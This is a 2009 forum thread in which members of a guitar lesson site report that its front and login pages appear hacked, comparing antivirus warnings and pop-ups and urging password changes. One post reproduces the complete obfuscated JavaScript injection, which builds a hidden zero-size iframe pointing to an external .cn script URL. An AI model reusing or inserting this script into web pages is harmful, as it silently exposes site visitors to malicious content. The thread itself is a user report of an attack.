Reply to this topicStart new topic
> Urchin Tracker
maharzan
post May 7 2009, 09:16 AM
Post #1


Veteran Guitar Lord
*

Group: Members
Posts: 2.333
Joined: 2-May 09
From: Kathmandu
Member No.: 7.127



Hey admin,

The site has been attacked by malware and I am getting warning on my screen. I have encountered this 'virus' a lot times. Though it doesn't do any damage, it writes down unncecessary javascripts on index (and login) pages of the website. If you view the source code for the front page you see something like this at the bottom..

CODE
<script type="text/javascript">
var _0xcc7a=["\x62\x6F\x64\x79","....


You can remove this by opening (if it allows) this particular page and remove that code manually. If you have antivirus then it will not allow you to open the page saying trojan. I have not experienced any harm with this but please be careful.

The remedy is to change all your FTP passwords. I think when its easy password, the hackers seem to hack it easily to write these things on the pages.

Thank you,
CM

PS: I didn't want to lose this site as I m practicing.. so alerting you. smile.gif AND I am on a mac so hopefully Im safe. smile.gif


--------------------
Checkout my YouTube & my band Nissim's YouTube channels.
Go to the top of the page
 
+Quote Post
Bogdan Radovic
post May 7 2009, 09:29 AM
Post #2


Bass & Beginner Instructor
Group Icon

Group: GMC Instructor
Posts: 15.612
Joined: 30-November 07
From: Belgrade, Serbia
Member No.: 3.410



Hmm this hasn't happened to me ever with GMC, but I'm experiencing this problem on another web site I visit often..Its blocked by Firefox and it isn't a malware web site.


--------------------
For GMC support please email support (at) guitarmasterclass.net
Check out my lessons and my instructor board.
Check out my beginner guitar lessons course! ; Take a bass course now!
My solo and band songs : Keep Going On, Night Vibe, Kad Te Vidim, Susret, Plava Silueta
Go to the top of the page
 
+Quote Post
fkalich
post May 7 2009, 09:40 AM
Post #3


GMC:er
*

Group: Members
Posts: 2.742
Joined: 12-February 07
From: People's Republic of Lawrence Kansas
Member No.: 1.189



I have been seeing some strange things. like save window popping up, other things. would not say for sure that the problem is not just my old laptop is busy,need rebooting, but seems more than coincidence. several strange things have happened. I guess the site may have to be taken down for awhile,IF there is a problem, and cleaned up. I am going to scan my computer for now.

edit: I am not saying I am sure that there is problem with GMC, just I have suspicions also now.

This post has been edited by fkalich: May 7 2009, 09:42 AM
Go to the top of the page
 
+Quote Post
maharzan
post May 7 2009, 09:46 AM
Post #4


Veteran Guitar Lord
*

Group: Members
Posts: 2.333
Joined: 2-May 09
From: Kathmandu
Member No.: 7.127



I got that warning just today so posted it. As you can see if the footer section (if you view source), there are a lot of characters (hexa decimals) which suggest its been attacked. Yep, firefox / AVG used to show the warning when I was in PC before. But as I said, its nothing major but why give them the chance... smile.gif

and it only does it in the index page (sometimes in login pages as well).. so you can see that only in the landing page of GMC.

This post has been edited by maharzan: May 7 2009, 09:47 AM


--------------------
Checkout my YouTube & my band Nissim's YouTube channels.
Go to the top of the page
 
+Quote Post
fkalich
post May 7 2009, 09:48 AM
Post #5


GMC:er
*

Group: Members
Posts: 2.742
Joined: 12-February 07
From: People's Republic of Lawrence Kansas
Member No.: 1.189



Houston: we have a problem.

Site will be going down I am sure, so I am out of here for now
Go to the top of the page
 
+Quote Post
Saoirse O'Shea
post May 7 2009, 09:49 AM
Post #6


Moderator - low level high stakes
Group Icon

Group: GMC Senior
Posts: 6.173
Joined: 27-June 07
From: Espania - Cadiz province
Member No.: 2.194



Thanks Malharzan

AFAIK 'urchin tracker' is often used by google analytics as a tracker to collect stats data. As such you could see 'urchin tracker' as spyware/malware. I don't think it could cause popup windows like fkalich is getting though.

Anyway I'll bring this to Kris attention.


--------------------
Get your music professionally mastered by anl AES registered Mastering Engineer. Contact me for Audio Mastering Services and Advice and visit our website www.miromastering.com

Be friends on facebook with us here.

We use professional, mastering grade hardware in our mastering studo. Our hardware includes:
Cranesong Avocet II Monitor Controller, Dangerous Music Liasion Insert Hardware Router, ATC SCM Pro Monitors, Lavry Black DA11, Prism Orpheus ADC/DAC, Gyratec Gyraf XIV Parallel Passive Mastering EQ, Great River MAQ 2NV Mastering EQ, Kush Clariphonic Parallel EQ Shelf, Maselec MLA-2 Mastering Compressor, API 2500 Mastering Compressor, Eventide Eclipse Reverb/Echo.
Go to the top of the page
 
+Quote Post
wrk
post May 7 2009, 10:01 AM
Post #7


Learning Tone Seeker
*

Group: Members
Posts: 1.027
Joined: 19-June 06
From: Paris/France (..used to be german)
Member No.: 723



I got this warning message this morning. I finally thought something went wrong on my computer as i could not reproduce it, but now that others have something similar ..
[attachment=15496:Picture_2.png]


--------------------
Go to the top of the page
 
+Quote Post
AlexLion
post May 7 2009, 10:02 AM
Post #8


GMC:er
*

Group: Members
Posts: 1.247
Joined: 19-September 08
From: Latvia, Jelgava
Member No.: 5.926



Is that the reason why I can`t open the site? sad.gif IE write me that site cannot be opened.. That hackers will burn in hell...

Edit: Just realized that in Opera it`s working ohmy.gif

This post has been edited by AlexLion: May 7 2009, 10:08 AM
Go to the top of the page
 
+Quote Post
fkalich
post May 7 2009, 10:02 AM
Post #9


GMC:er
*

Group: Members
Posts: 2.742
Joined: 12-February 07
From: People's Republic of Lawrence Kansas
Member No.: 1.189



QUOTE (tonymiro @ May 7 2009, 03:49 AM) *
Thanks Malharzan

AFAIK 'urchin tracker' is often used by google analytics as a tracker to collect stats data. As such you could see 'urchin tracker' as spyware/malware. I don't think it could cause popup windows like fkalich is getting though.

Anyway I'll bring this to Kris attention.


This is the only site I have been to all day. Someone just tried to sell me a car.

Don't assume that what he discovered is the only problem. You had all better run spyware. My virus protection picked up the virus, but I am going to run that also anyway.

I have not been greatly impressed with Kris's service provider in the past. That perception has not improved today. I never get this kind of thing, because I don't go to the kind of sites where something like this is likely. If I were Kris, I would not be happy at all about this.
Go to the top of the page
 
+Quote Post
Emir Hot
post May 7 2009, 10:06 AM
Post #10


Instructor
Group Icon

Group: GMC Instructor
Posts: 7.201
Joined: 14-July 08
From: London UK
Member No.: 5.490



I don't have this problem and I have a good protecion with the latest updates. It always warns me about these things but in case of GMC I have never had such warning. Anyway it's good to know that something might be going on so I am prepared.


--------------------
Check out my <a href="https://www.guitarmasterclass.net/instructor/Emir-Hot" target="_blank">Instructor profile</a>

www.emirhot.com
www.myspace.com/emirhotguitar
www.myspace.com/sevdahmetal
Go to the top of the page
 
+Quote Post
Matt23
post May 7 2009, 10:11 AM
Post #11


Accomplished Tone Master
Group Icon

Group: GMC Wiki:er
Posts: 1.745
Joined: 17-January 08
From: Scotland
Member No.: 3.866



Today I got 2 popups for the first time on GMC. I'm sure it'll be fixed soon though.
I'd just like to ask though, right now is the site safe to browse, and is popups is the worst ill get?
Go to the top of the page
 
+Quote Post
Siggum
post May 7 2009, 10:23 AM
Post #12


GMC:er
*

Group: Members
Posts: 1.228
Joined: 3-January 08
From: Denmark
Member No.: 3.701



I got the same error message in internet explorer, that it wouldnt open the gmc page.. i am now writing in firefox.. but surely something is up!


--------------------


It dont mean a thing if it aint got that swing
Go to the top of the page
 
+Quote Post
Matt23
post May 7 2009, 10:30 AM
Post #13


Accomplished Tone Master
Group Icon

Group: GMC Wiki:er
Posts: 1.745
Joined: 17-January 08
From: Scotland
Member No.: 3.866



Now AVG just found two "JS/Obfuscated" infections, right after I was on GMC and no other website. I don't suppose this means much, but I thought I'd say it just incase it helps resolve the problem.
Go to the top of the page
 
+Quote Post
maharzan
post May 7 2009, 11:41 AM
Post #14


Veteran Guitar Lord
*

Group: Members
Posts: 2.333
Joined: 2-May 09
From: Kathmandu
Member No.: 7.127



QUOTE (tonymiro @ May 7 2009, 09:49 AM) *
Thanks Malharzan

AFAIK 'urchin tracker' is often used by google analytics as a tracker to collect stats data. As such you could see 'urchin tracker' as spyware/malware. I don't think it could cause popup windows like fkalich is getting though.

Anyway I'll bring this to Kris attention.


I have used google analytics before but this is the usual pattern that this kind of hack pastes the javascript code.. unnecessary weird long lines and I am sure this is the unwanted part of urchin tracker. smile.gif

CODE
var _0xcc7a=["\x62\x6F\x64\x79","\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x73\x42\x79\x54\x61\x67\x4E\x61
\x6D\x65","\x69\x66\x72\x61\x6D\x65","\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74","\x73\x72
\x63","\x68\x74\x74\x70\x3A\x2F\x2F\x69\x6D\x67\x6E\x6F\x64\x65\x2E\x63\x6E\x2F\x73\x63\x72\x69\x70\x74
\x2F\x69\x6E\x2E\x63\x67\x69\x3F\x32","\x73\x65\x74\x41\x74\x74\x72\x69\x62\x75\x74\x65","\x77\x69\x64
\x74\x68","\x68\x65\x69\x67\x68\x74","\x66\x72\x61\x6D\x65\x62\x6F\x72\x64\x65\x72","\x61\x70\x70\x65
\x6E\x64\x43\x68\x69\x6C\x64"];b=document[_0xcc7a[0x1]](_0xcc7a[0x0])[0x0];
i=document[_0xcc7a[0x3]](_0xcc7a[0x2]);i[_0xcc7a[0x6]](_0xcc7a[0x4],_0xcc7a[0x5]);i[_0xcc7a[0x6]]
(_0xcc7a[0x7],0x0);i[_0xcc7a[0x6]](_0xcc7a[0x8],0x0);i[_0xcc7a[0x6]](_0xcc7a[0x9],0x0);b[_0xcc7a[0xa]](i);


Hope this won't show as a bug in here.

EDIT: oops that stretched it long.. cut that a bit

This post has been edited by maharzan: May 7 2009, 11:42 AM


--------------------
Checkout my YouTube & my band Nissim's YouTube channels.
Go to the top of the page
 
+Quote Post
fkalich
post May 7 2009, 11:41 AM
Post #15


GMC:er
*

Group: Members
Posts: 2.742
Joined: 12-February 07
From: People's Republic of Lawrence Kansas
Member No.: 1.189



I just ran spywear, and only some cookie adware. Nothing serious. Then again, my virus protection protected me.
I should get resident spyware like Hot, but I am cheap, I have to run mine manually, so it won't real time defend me. Maybe I should install windows defender.

btw, I realize I am being a jerk when I jump on the service provider's case. They had been decent over the past year. I realized that like 10 seconds later. I can't help it, because I was raised to be a jerk. It is a life long struggle to fight it. In my defense, at least I am aware of it, whereas my brothers and sisters are either as bad as me, o all even worse jerks if you can imagine that, and are all totally oblivious to that fact. At least I struggle against it.
Go to the top of the page
 
+Quote Post

Reply to this topicStart new topic
1 User(s) are reading this topic (1 Guests and 0 Anonymous Users)
0 Members:

 


RSS Lo-Fi Version Time is now: 24th July 2017 - 07:36 AM